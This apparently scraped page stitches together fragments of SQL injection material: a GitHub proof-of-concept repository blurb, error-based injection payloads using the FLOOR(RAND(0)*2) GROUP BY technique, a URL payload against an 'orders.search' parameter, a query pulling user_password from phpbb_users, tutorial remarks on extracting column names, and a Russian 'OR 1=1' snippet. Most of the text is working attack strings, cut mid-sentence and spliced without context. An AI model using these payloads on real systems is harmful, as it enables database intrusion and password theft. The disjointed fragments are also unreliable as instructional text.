poc from bugscan beebeeto. Contribute to burnegg/poc development by creating an account on GitHub.
...FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP
Word Mocha search by letters: nturb+AND+(SELECT+9523+FROM(SELECT+COUNT(*),CONCAT(0x716b627a71,(SELECT+(ELT(9523=9523,1))),0x7170706b71,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a).
+and+(select+*+from+(select+*+from+information_schema.tables+join+information_schema.tables+x)a)--. Duplicate column name 'TABLE_CATALOG'. This will work almost as a limit, getting you column names one by one.
...(SELECT+(SELECT+user_password)+FROM+phpbb_users+LIMIT+22000,1),FLOOR(rand(0)*2))x+FROM+phpbb_users+GROUP+BY+x)
...Silkas+AND+(SELECT+2254+FROM(SELECT+COUNT(*),CONCAT(0x716b717671,(SELECT+(ELT(2254=2254,1))),0x7171706b71,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a).
information_schema.tables group by x)a) and 1=1
/index.php?dispatch=orders.search%29+AND+%28SELECT+5361+FROM%28SELECT+COUNT(*),CONCAT%280x7171706271,(SELECT+
+or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--. Method 3. These here are harder methods of error based, that you shouldn't go into unless the ones above don't work.
SELECT * FROM news WHERE id_news = -1 OR 1=1. Таким образом, изменение входных параметров путём добавления в них